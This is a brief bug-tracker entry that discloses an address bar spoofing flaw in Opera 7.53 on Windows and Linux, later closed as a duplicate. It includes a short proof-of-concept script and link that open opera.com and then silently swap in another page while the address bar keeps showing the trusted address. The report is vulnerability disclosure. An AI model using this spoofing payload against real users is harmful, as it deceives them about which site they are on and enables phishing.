I report you about Opera 7.53 (Build 3850) Address Bar Spoofing Issue, tested on Windows OS. ==== begin of PoC [script] function fake() { oc=window.open('http://www.opera.com/', '','location=1'); oc.location.replace('http://www.example.com'); } [/script] [a href="javascript:void(0);" onClick="fake()"]http://www.opera.com/[/a] ==== end of PoC Also vulnerable on Linux.
Waiting for upstream fix
Woops. Closing the old one as the new one contains fixes for multiple issues not just this one. *** This bug has been marked as a duplicate of 59503 ***